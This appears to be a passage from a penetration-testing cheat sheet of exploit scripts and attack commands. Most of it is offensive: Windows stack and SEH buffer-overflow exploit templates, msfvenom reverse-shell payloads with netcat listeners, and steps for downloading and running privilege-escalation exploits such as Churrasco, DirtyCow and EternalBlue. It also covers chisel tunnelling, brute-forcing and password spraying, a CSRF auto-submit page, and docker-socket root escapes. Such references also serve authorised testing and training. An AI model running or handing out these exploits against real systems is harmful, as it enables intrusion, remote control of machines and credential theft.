buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
print "[+] Sending buffer..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((target_IP, target_port))
s.recv(1024) # receive banner etc., adapt if needed
s.send(buffer + '\r\n') # send buffer
s.close()
print "[+] Exploit completed!"
### take note of EIP value + determine offset
msf-pattern_offset -l 1000 -q EIP_value_here
### overwrite EIP with B's
#!/usr/bin/env python
import socket
import os
import sys
target_IP = 'victim_IP_here' # CHANGE THIS
target_port = victim_port_here # CHANGE THIS
buffer = "A" * offset_here # CHANGE THIS (fill up buffer until EIP overwrite)
buffer += "B" * 4 # overwrite EIP
buffer += "C" * 600 # scout out more space for shellcode
print "[+] Sending buffer..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((target_IP, target_port))
s.recv(1024) # receive banner etc., adapt if needed
s.send(buffer + '\r\n') # send buffer
s.close()
print "[+] Exploit completed!"
## jump to buffer
#!/usr/bin/env python
import socket
import os
import sys
target_IP = 'victim_IP_here' # CHANGE THIS
target_port = victim_port_here # CHANGE THIS
shellcode = "\xcc" # breakpoint, will become shellcode eventually
buffer = "A" * offset_here # CHANGE THIS (fill up buffer until EIP overwrite)
buffer += "\xaa\xbb\xcc\xdd" # CHANGE THIS overwrite EIP with address of jmp ESP instruction in little endian
buffer += "\x90" * 20 # pad with NOPs (check where in the C buffer we land + pad with roughly as many NOPs before the shellcode)
buffer += shellcode
buffer += "C" * 600 # scout out more space for shellcode
print "[+] Sending buffer..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((target_IP, target_port))
s.recv(1024) # receive banner etc., adapt if needed
s.send(buffer + '\r\n') # send buffer
s.close()
print "[+] Exploit completed!"
## find bad chars
#!/usr/bin/env python
target_IP = 'victim_IP_here' # CHANGE THIS
target_port = victim_port_here # CHANGE THIS
import socket
import os
import sys
shellcode = "\xcc" # breakpoint, will become shellcode eventually
badchars = ( # bad chars : "\x00"
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
buffer = "A" * offset_here # CHANGE THIS (fill up buffer until EIP overwrite)
buffer += "\xaa\xbb\xcc\xdd" # CHANGE THIS overwrite EIP with address of jmp ESP instruction
buffer += "\x90" * 20
#buffer += shellcode
buffer += badchars # put ascii table into buffer + check for bad chars
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((target_IP, target_port))
s.recv(1024) # receive banner etc., adapt if needed
s.send(buffer + '\r\n') # send buffer
s.close()
print "[+] Exploit completed!"
## implement shellcode
### generate shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=attacker_IP_here LPORT=attacker_port_here -f py -a x86 -b "\x00\bad_chars_here"| sed 's/buf/shellcode/'
### set up listener
rlwrap nc -lnvp attacker_port_here
### exploit script
#!/usr/bin/env python
target_IP = 'victim_IP_here' # CHANGE THIS
target_port = victim_port_here # CHANGE THIS
import socket
import os
import sys
#shellcode = "\xcc" # breakpoint, will become shellcode eventually
shellcode = b""
shellcode += b"\xd9\xe1\xd9\x74\x24\xf4\x5b\x29\xc9\xb8\xc7\xab\x3a"
[...] # CHANGE THIS - shellcode here
shellcode += b"\xb1\x69\xa7\xcf\x75\x82\xd5\x40\x10\xa4\x4a\x60\x31"
buffer = "A" * offset_here # CHANGE THIS (fill up buffer until EIP overwrite)
buffer += "\xaa\xbb\xcc\xdd" # CHANGE THIS overwrite EIP with address of jmp ESP instruction
buffer += "\x90" * 20
buffer += shellcode # place shellcode after NOP sled
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((target_IP, target_port))
s.recv(1024) # receive banner etc., adapt if needed
s.send(buffer + '\r\n') # send buffer
s.close()
print "[+] Exploit completed!"
-------------------------------------------------
# SEH overflow - WIN
## crash application
### PY2
#!/usr/bin/env python
import socket
import os
import sys
target_IP = 'victim_IP_here' # CHANGE THIS
target_port = victim_port_here # CHANGE THIS
buffer = "A" * 1000 # CHANGE THIS (increment buffer size until crash)
print "[+] Sending buffer..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((target_IP, target_port))
s.recv(1024) # receive banner etc., adapt if needed
s.send(buffer + '\r\n') # send buffer
s.close()
print "[+] Exploit completed!"
## determine EIP offset
### create pattern
msf-pattern_create -l 1000
### plug pattern as buffer
#!/usr/bin/env python
import socket
import os
import sys
target_IP = 'victim_IP_here' # CHANGE THIS
target_port = victim_port_here # CHANGE THIS
buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
print "[+] Sending buffer..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((target_IP, target_port))
s.recv(1024) # receive banner etc., adapt if needed
s.send(buffer + '\r\n') # send buffer
s.close()
print "[+] Exploit completed!"
### take note of EIP value + determine offset (= offset to SEH)
msf-pattern_offset -l 1000 -q EIP_value_here
### calculate offset to nSEH (located 4 bytes before SEH)
nSEH_offset = calculated_SEH_offset_here - 4
### overwrite nSEH with B's, SEH with C's, shellcode_placeholder with D's
#!/usr/bin/env python
import socket
import os
import sys
target_IP = 'victim_IP_here' # CHANGE THIS
target_port = victim_port_here # CHANGE THIS
buffer = "A" * offset_here # CHANGE THIS (fill buffer up to nSEH_offset)
buffer += "B" * 4 # overwrite nSEH
buffer += "C" * 4 # overwrite SEH
buffer += "D" * (2500 - len(buffer)) # scout out more space for shellcode
print "[+] Sending buffer..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((target_IP, target_port))
s.recv(1024) # receive banner etc., adapt if needed
s.send(buffer + '\r\n') # send buffer
s.close()
print "[+] Exploit completed!"
## find suitable POP POP RET gadget
### locate all POP POP RET
!mona seh # C:\Program Files\immunity Inc\Immunity Debugger\seh.txt
### find suitable one
RET # suitable
RET some_value_here # unsuitable
Rebase: False # suitable
Rebase: True # unsuitable
## write POP POP RET address into SEH
#!/usr/bin/env python
import socket
import os
import sys
target_IP = 'victim_IP_here' # CHANGE THIS
target_port = victim_port_here # CHANGE THIS
shellcode = "\xcc" # breakpoint, will become shellcode eventually
buffer = "A" * offset_here # CHANGE THIS (fill buffer up to nSEH_offset)
buffer += "B" * 4 # overwrite nSEH
buffer += "\xaa\xbb\xcc\xdd" # CHANGE THIS overwrite SEH with address of POP POP RET gadget in little endian
buffer += "D" * (2500 - len(buffer)) # scout out more space for shellcode
print "[+] Sending buffer..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((target_IP, target_port))
s.recv(1024) # receive banner etc., adapt if needed
s.send(buffer + '\r\n') # send buffer
s.close()
print "[+] Exploit completed!"
## find bad chars
#!/usr/bin/env python
target_IP = 'victim_IP_here' # CHANGE THIS
target_port = victim_port_here # CHANGE THIS
import socket
import os
import sys
shellcode = "\xcc" # breakpoint, will become shellcode eventually
badchars = ( # bad chars : "\x00"
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
buffer = "A" * offset_here # CHANGE THIS (fill up buffer until EIP overwrite)
buffer += "\xaa\xbb\xcc\xdd" # CHANGE THIS overwrite EIP with address of jmp ESP instruction
buffer += "\x90" * 20
#buffer += shellcode
buffer += badchars # put ascii table into buffer + check for bad chars
buffer += "D" * (2500 - len(buffer)) # scout out more space for shellcode
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((target_IP, target_port))
s.recv(1024) # receive banner etc., adapt if needed
s.send(buffer + '\r\n') # send buffer
s.close()
print "[+] Exploit completed!"
## implement shellcode
### generate shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=attacker_IP_here LPORT=attacker_port_here -f py -a x86 -b "\x00\bad_chars_here"| sed 's/buf/shellcode/'
### set up listener
rlwrap nc -lnvp attacker_port_here
### exploit script
#!/usr/bin/env python
target_IP = 'victim_IP_here' # CHANGE THIS
target_port = victim_port_here # CHANGE THIS
import socket
import os
import sys
#shellcode = "\xcc" # breakpoint, will become shellcode eventually
shellcode = b""
shellcode += b"\xd9\xe1\xd9\x74\x24\xf4\x5b\x29\xc9\xb8\xc7\xab\x3a"
[...] # CHANGE THIS - shellcode here
shellcode += b"\xb1\x69\xa7\xcf\x75\x82\xd5\x40\x10\xa4\x4a\x60\x31"
buffer = "A" * offset_here # CHANGE THIS (fill up buffer until EIP overwrite)
buffer += "\xaa\xbb\xcc\xdd" # CHANGE THIS overwrite EIP with address of jmp ESP instruction
buffer += "\x90" * 20
buffer += shellcode # place shellcode after NOP sled
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((target_IP, target_port))
s.recv(1024) # receive banner etc., adapt if needed
s.send(buffer + '\r\n') # send buffer
s.close()
print "[+] Exploit completed!"
# import .pfx to access certificate-protected website
Project options > TLS > Client TLS Certificates > Add > PKCS#12
# set scope to *.domain.here
.*\.domain\.here$
# HTTP server
busybox httpd -f -p port_here
# shellcode tester
#include<stdio.h>
#include<string.h>
unsigned char code[] = "shellcode_here";
main(){
printf("Shellcode length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
# open connection to webdav endpoint
cadaver
open url_here/path/to/webdav
# upload file
put /path/to/file/on/attacker/box file_name_on_webdav_here
# list files
ls
# send single CAN packet
cansend interface_here arbitration_id_here#data_here # interface e.g. can0, vcan0, slcan0; arbitration ID e.g. 300
# sniff CAN traffic
cansniffer -c interface_here # e.g. can0, vcan0, slcan0
# filter packets
## clear all
-00000
## show only packets with arbitration ID 204
+204
## bitmask for packets 300-3FF
+300700 # arbitration ID only 3 bits --> 7 enough, no need for F
# setup virtual CAN network
## load vcan module
modprobe vcan
## check output
dmesg
## set up interface
ip link add dev vcan0 type vcan
ip link set up vcan0
## verify setup
ifconfig vcan0
# dump can traffic
python3 /path/to/cc.py dump
# send code for "tester present" to every arbitration ID
python3 /path/to/cc.py dcm discovery
python3 /path/to/cc.py dcm discovery -min 0x123 # start from 0x123
# renew certificate
certbot renew -v --dry-run
certbot renew -v
# download file
certutil -urlcache -split -f url_to_web_file /path/to/out/file
# calculate hashsum
certutil -hashfile /path/to/file HASHTYPE_here # SHA1, MD5, etc.
# base64 decode
certutil -decode /path/to/b64file.txt /path/to/outfile.txt
# create a wordlist from URL
cewl -w /path/to/outfile.txt -v url_here
# create wordlist with minimum word length
cewl -w /path/to/outfile.txt -m min_length_here url_here
# check flags on binary
checksec file_name_here
checksec --file=file_name_here
# prepare exploit
## download Chimichurri.exe onto attacker box
wget https://github.com/egre55/windows-kernel-exploits/raw/master/MS10-059:%20Chimichurri/Compiled/Chimichurri.exe
## set up python http server + transfer exploit to victim box
certutil -urlcache -split -f http://attacker_IP_here/Chimichurri.exe >Chimichurri.exe
## set up listener on attacker box + run on victim box
.\Chimichurri.exe attacker_IP_here port_here
# set up tunnel
## set up server on attacker box
chisel server -p listener_port_here
## set up server + allow clients to open listening port on server
chisel server -p listener_port_here --reverse
## transfer chisel to target
## connect back to attacker box as client (forward_port required)
chisel client attacker_IP_here:listener_port_here listener_host-here:listener_port_here:target_forward_host_here:target_forward_port_here
## connect back to attacker box as client (open up listening port on server)
chisel client attacker_IP_here:listener_port_here R:listener_port_here:target_forward_host_here:target_forward_port_here
# set up SOCKS proxy
## set up server on attacker box
chisel server -p listener_port_here --reverse
## transfer chisel to target
## set up client
chisel client attacker_IP_here:listener_port_here R:socks
# prepare exploit
## download churrasco.exe onto attacker box
wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
## generate reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=attacker_IP_here LPORT=port_here -f exe -a x86 -o shell.exe
## set up python http server + transfer reverse shell + exploit to victim box
certutil -urlcache -split -f http://attacker_IP_here/churrasco.exe >churrasco.exe
## set up listener on attacker box + run on victim box
.\churrasco.exe shell.exe
# display arp entries
arp -a
# clear screen
cls
# list stored credentials
cmdkey /list
# execute commands
cmd.exe /c command_here
# run .exe
start \path\to\exe
# enumerate hidden files
dir -ah
dir /ah
attrib
# show alternate data streams
dir /a /r
# find writable folders
dir /a-r-d /s /b
# show short paths
dir /x
# show path variable
path
echo %PATH%
# run local executable
.\some_executable_here
# show environment variable
echo %variable_name_here%
# show other variables
set
# set other variables
set variable_name=value_here
# find string in config files
findstr /SI /M "string_here" *.xml *.ini *.txt *.config
# chain commands - execute both
first_command & second_command
# chain commands - only execute second if first successful
first_command && second_command
# chain commands - pipe output of first into second
first_command | second_command
# chain commands - if first fails, execute second
first_command || second_command
# conditional statements
if %some_variable%==some_value (command_here) else (some_other_command_here)
# list files in directory
for %i in (*.*) do @echo FILE: %i
# display output without command prompt
@command_here
# enumerate shares
nbtstat -A IP_here
# show firewall status
netsh firewall show state
# show firewall config
netsh firewall show config
# get proxy settings
## system-wide
netsh winhttp show proxy
## user-specific
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
# find connections for specific service
netstat -anbo
# show open connections
netstat -ano
# find listening ports
netstat -an | findstr "LISTENING"
# find a domain controller (on box)
nltest /dsgetdc:domain_name_here
# find applied patches
type C:\Windows\WindowsUpdate.log | findstr KB
# display routing tables
route print
# ping host
ping -n 1 IP_here
# list scheduled tasks
schtasks /query /fo LIST /v
# get details for app_name_here
schtasks /query /TN "\path\to\app_name_here" /v /fo LIST
# print info
set
# start file explorer in current folder
start .
# print systeminfo
systeminfo
# kill process
taskkill /im:process_name_here
# force kill process
taskkill /im:process_name_here /f
# list processes
tasklist
# show services
tasklist /svc
net start
wmic service list brief
wmic service list
# display processus running as SYSTEM
tasklist /v /fi "username eq SYSTEM"
# display processus running as ADMINISTRATOR
tasklist /v /fi "username eq ADMINISTRATOR"
# locate file
where /r C:\path\to\search\folder *.extension_here *.another_extension_here
# display user information
whoami /all
# display user privileges
whoami /priv
# find domain name (on box)
wmic computersystem get domain
# run as other user
C:\Windows\System32\runas.exe /env /noprofile /user:user_name_here password_here "command_or_program_here"
C:\Windows\System32\runas.exe /netonly /user:domain_here\user_name_here password_here "command_or_program_here"
# exploit unquoted service paths
## find services with unquoted service paths
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
## check for write permissions --> (W)
icacls C:\path\to\folder\here
## rename file
rename old_file_name new_file_name
# show help
help compgen
# list all aliases
compgen -a
# list all shell built-ins
compgen -b
# list all commands
compgen -c
# list current directory name
compgen -d
# list names of exported shell variables
compgen -e
# list files in current directory
compgen -f
# list groups
compgen -g
# list jobs
compgen -j
# list reserved words
compgen -k
# list services
compgen -s
# list user aliases
compgen -u
# list shell variables
compgen -v
# list all documents
_all_docs
# list chanegs
_changes
# add new admin
curl -s -X PUT http://server_IP_here:5984/_config/admins/new_admin_name_here -d '"password_here"' # CouchDB 1.0
curl -s -X PUT $HOST/_node/$NODENAME/_config/admins/new_admin_name_here -d '"password_here"' # CouchDB 2.0
# list all available nodes
curl -X GET $HOST/_membership
# check for password policy on Windows domain
crackmapexec protocol_here IP_here --pass-pol -u '' -p ''
# brute force login
crackmapexec protocol_here IP_here -u userlist.txt -p passwordlist.txt
# crawl smb shares
crackmapexec smb IP_here -u user -p password -M spider_plus
# check credentials
cme smb IP_here -u user_here -p 'password_here'
# password spraying
cme smb host_here -u users.txt -p "password_here" --continue-on-success
cme smb host_here -u users.txt -p "password_here" --continue-on-success | tee -a pw_spray.cme # log to pw_spray.cme
# find hosts with disabled SMB signing
cme smb DC_IP_here --gen-relay-list IP_range_here
# add machine account to domain
addcomputer.py -computer-name "some_name" -computer-pass "some_pass" -dc-host DC_IP_here -domain-netbios domain_name_here domain_here/user_here:password_here -debug
# access db (see results)
cmedb
# CMEDB create workspace
workspace create workspace_name_here
# CMEDB choose protocol
proto smb # ldap etc.
# CMEDB export results
export shares detailed shares.csv #detailed or simple
export hosts detailed hosts.csv
# brute force RDP login (ideally 1 thread for RDP) - single username
crowbar -b rdp -s target_IP_or_subnet_here -u user_name_here -C /path/to/wordlist -n number_of_threads_here
# brute force RDP login (ideally 1 thread for RDP) - user list in file
crowbar -b rdp -s target_IP_or_subnet_here -U user_list_here -C /path/to/wordlist -n number_of_threads_here
# brute force ssh keys for user
crowbar -b sshkey -s target_IP_here -u user_name_here -k /path/to/key/folder/
# pattern
# a-z
@
# A-Z
,
# 0-9
%
# special chars (incl. space)
^
# generate wordlist
crunch min_length_here max_length_here -t pattern_here -o /path/to/outfile
# generate wordlist with limited character set (predefined charsets in /usr/share/crunch/charset.lst)
crunch min_length_here max_length_here allowed_chars_here -t pattern_here -o /path/to/outfile
crunch min_length_here max_length_here -f /usr/share/crunch/charset.lst charset_name_here -o /path/to/outfile
# run .vbs script
cscript /path/to/vbs_script args_here
# download file
cscript wget.vbs http://attacker_IP/path/to/file outfile_here
<html>
<head></head>
<body>
<form action="http://vulnerable.site/vuln_form.php" method="POST">
<input type="hidden" name="param1" value="value1">
<input type="hidden" name="param2" value="value2">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# basic syntax
curl "protocol_here://url_here"
# send GET request
curl -X GET "https://url_here" -H "header_here: value_here" -H "another_header_here: value_here" -H "header_without_value;"
# send POST request
## POST params
curl -X POST "https://url_here" -d "param1=value_here¶m2=value_here"
## json data
curl -X POST "https://url_here" -H "header_here: value_here" -d "{\"some_data\":\"value_here\",\"some_more_data\":\"value_here\"}"
# PUT file
curl -T /path/to/local/file https://url_here/path/to/remote/file
# PUT json data
curl -X PUT -H "Content-Type: application/json" -d '{"key":"value","key":"value"}' https://url_here
# retrieve file from IMAP/S, POP3/S, SCP, SFTP, SMB/S, SMTP/S, TELNET, TFTP
curl -O /path/to/outfile url_here
# get current IP
curl ip.me
# extract 2nd field, fields delimited by ","
echo "some enumeration of stuff, more stuff, even more stuff" | cut -f 2 -d ","
# specify field, delimiter (only single char!)
cut -f no_here -d "delimiter_here" /path/to/file
# find outdated Windows OS
MATCH (H:Computer) WHERE H.operatingsystem =~ '(?i).*(2000|2003|2008|xp|vista|me|7).*' RETURN H.name,H.operatingsystem
# check permissions on exposed WebDAV endpoint
davtest -url http://endpoint_URL_here
# convert apk to jar
d2j-dex2jar /path/to/apk -o outfile.jar
# print public IP
dig +short myip.opendns.com @resolver1.opendns.com
# zone transfer
dig @nameserver_here axfr domain_here
# dirbust domain
dirb url_here
# set cookie
dirb -c cookie_here url_here
# set header
dirb -H header_here url_here
# don't show specific response code
dirb -N response_code_here url_here
# no recursion
dirb -r url_here
# interactive recursion
dirb -R url_here
# authenticated scan
dirb -u user_name_here:password_here url_here
# delay between request
dirb url_here -z delay_in_milliseconds_here url_here
# get exploit
wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c
# compile
gcc -pthread dirty.c -o dirty -lcrypt
# run
./dirty
# set pwd + su to new user
su firefart
# list disks
list disk
# list volumes
list volume
# refresh device list
rescan
# grab info (subdomains, zone transfer, reverse lookup etc.)
dnsenum domain_here
# find hostname
dnsrecon -d domain_here -r range_here
# attempt zone transfer
dnsrecon -d domain_here -t axfr
# brute force subdomains
dnsrecord -d domain_here -D /path/to/wordlist -t brt
# enumerate subdomains with google enumeration
dnsrecon -d domain_here -g
# show available containers
docker ps
# run shell in container
docker exec -it container_ID_here /bin/bash
# privilege escalation over writable docker socket (e.g. /var/run/docker.sock)
docker -H unix:///path/to/writable/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
docker -H unix:///path/to/writable/docker.sock run -it --privileged --pid=host ubuntu nsenter -t 1 -m -u -n -i sh
# convert text files from DOS to Unix (CR/LF -> LF)
dos2unix filename
dos2unix filename -n new_file
# convert text files from Unix to DOS (LF -> CR/LF)
unix2dos filename
unix2dos filename -n new_file
# install local package
dpkg -i /path/to/.deb
# connect from WSL to emulated android device
(start emulated android device)
## on win, set up port forwarding to the emulated device
adb forward tcp:31415 tcp:31415
## find win ip
ipconfig [--> wsl interface] on win
cat /etc/resolv.conf [nameserver] on lin
## on lin, launch the drozer console:
drozer console --server win_ip_here:31415 connect
# check for attached devices
drozer console devices
drozer console --server win_ip_here:31415 devices
# droopescan
droopescan scan drupal -u IP_here
# convert .apk to .jar
/path/to/enjarify.sh -o /path/to/out.jar /path/to/in.apk
# show all environment variables
env
# set environment variable
export VARIABLE_HERE=value_here
# show environment variable's value
echo $VARIABLE_HERE
# setup virtualenv for PY2
virtualenv --python=python2 venv
source venv/bin/activate
# install impacket
pip2.7 install impacket
# get exploit
git clone https://github.com/worawit/MS17-010.git
#check whether target is vulnerable
python checker.py IP_here
# eternalblue_exploit
## generate shellcode
ls -l MS17-010/shellcode/
### x64
#### assemble kernel shellcode
nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin
#### generate payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=attacker_IP_here LPORT=port_here --platform windows -a x64 --format raw -o sc_x64_payload.bin
#### merge shellcode + payload
cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin
### x86
#### assemble kernel shellcode
nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin
#### generate payload
msfvenom -p windows/shell_reverse_tcp LHOST=attacker_IP_here LPORT=port_here --platform windows -a x86 --format raw -o sc_x86_payload.bin
#### merge shellcode + payload
cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin
### merge binaries (optional)
python MS17-010/shellcode/eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin
## setup listener
